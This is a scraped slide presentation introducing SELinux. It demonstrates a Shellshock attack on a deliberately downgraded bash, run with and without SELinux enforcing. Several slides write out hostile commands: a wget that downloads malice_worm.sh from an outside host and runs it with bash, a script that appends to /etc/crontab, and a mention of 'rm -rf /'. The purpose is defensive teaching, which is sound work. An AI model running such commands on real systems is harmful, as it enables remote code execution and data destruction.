Download presentation
Presentation is loading. Please wait.
Published byPhillip Parker Modified over 9 years ago
1
The SELinux of First Look
2
Prologue After many discussions with a lot of Linux users, I’ve come to realize that most of them seem to disable SELinux rather than understand why it’s always denying access and its worth.
3
Content Introduce SELinux Talk about some vulnerabilities around us Attack tests with or without SELinux Summary
4
SELinux Security-Enhanced Linux (SELinux) is a mandatory access control (MAC) security mechanism implemented in the kernel.
5
SELinux Policy The SELinux Policy is the set of rules that guide the SELinux security engine. It defines types for file objects and domains for processes. It uses roles to limit the domains that can be entered, and has user identities to specify the roles that can be attained. In essence, types and domains are equivalent, the difference being that types apply to objects while domains apply to processes.
6
Access Control Model Type Enforcement (TE): –Type Enforcement is the primary mechanism of access control used in the targeted policy Role-Based Access Control (RBAC): –Based around SELinux users (not necessarily the same as the Linux user), but not used in the default targeted policy Multi-Level Security (MLS): –Not commonly used and need install specific mls policy.
7
What Can SELinux do? SELinux does not block the exploit but it would prevent escalation of confined domains:SELinux can contain the exploits and reduce their influence.
8
Cyber Vulnerabilities In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance. Vulnerability is the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw[1]. [1]"The Three Tenets of Cyber Security". U.S. Air Force Software Protection Initiative. Retrieved 2009-12-15
9
Major Events HeartBleed(CVE-2014-0160) Shellshock(CVE-2014-6271) …
10
Attack Step 1 1.Make sure Shellshock is not patched. –If your bash’s version is higher than 4.2.45(1), you need downgrade it to 4.2.45(1) or lower versions.
11
Open Loophole –Not necessary Wget http://test.njucs-os.tk/selinuxtest/bash- 4.2.45-5.el7.x86_64.rpmhttp://test.njucs-os.tk/selinuxtest/bash- 4.2.45-5.el7.x86_64.rpm Yum downgrade bash-4.2.45-5.el7.x86_64.rpm –Wget http://test.njucs- os.tk/selinuxtest/region_date_daemonhttp://test.njucs- os.tk/selinuxtest/region_date_daemon –Wget http://test.njucs-os.tk/selinuxtest/start.shhttp://test.njucs-os.tk/selinuxtest/start.sh –Run start.sh
12
Attack Step 2 Test Shellsock
13
Attack Step 3 3. Run it to display current date based on TCP. It will display the current date and time in the given format by inputing local-info. Example:
14
Attack Step 4 4.Change the files contexts –If selinux is enabled, the behavior of date_daemon will be restricted in its domain by the context.
15
Attack Step 5 5.Prepare “malicious” script Injector. 1.#!/bin/bash 2. 3.now=$(date) 4.echo "$now: Your OS is pwned!" 5.echo "$now: Your OS is pwned!" >> /tmp/pwn.log 6.echo "# $now: Your OS is pwned!" >> /etc/crontab It is a very friendly malicious script! :P
16
Attack Tests In the test, we write a daemon running in the CentOS 7.0.1406 with SElinux in enforcing-mode or permissive-mode, let's run a designed Shellsock attack on it. The set of commands made up for this test Injector.sh: –rm malice_worm.sh ; –wget --no-verbose --output-document=malice_worm.sh http://test.njucs- os.tk/selinuxtest/malice_worm.sh; –rm injector.sh ; –bash malice_worm.sh
17
Attack Step 6 6.Attack OS with SELinux
18
Attack Step 7 7.Attack OS without SELinux
19
What-If… What would be happen If the script “rm –rf /” was put in the Injector.
20
Awesome SElinux protects your OS even if you have software security failing. How does selinux accomplish this protection task? –Utilize control points of objects in the system.
21
Control Point The following types are used with DHCP: dhcp_etc_t –This type is mainly used for files in the /etc/ directory, including configuration files. dhcpd_var_run_t –This type is used for the PID file for dhcpd, in the /var/run/ directory. dhcpd_exec_t –This type is used for transition of DHCP executable files to the dhcpd_t domain. dhcpd_initrc_exec_t –This type is used for transition of DHCP executable files to the dhcpd_initrc_t domain.
22
But the type of crontab is system_cron_spool_t, the process running as dhcpd_exec_t is not allowed to write to /etc/crontab.
23
Graphic Interpretation Without SELinuxWith SELinux
24
Conclusion SELinux does not block the exploit but it would prevent escallation of confined domains. Base SELinux we can build more enhanced security protection mechanism.
25
Thank you!
Similar presentations
© 2024 SlidePlayer.com. Inc.
All rights reserved.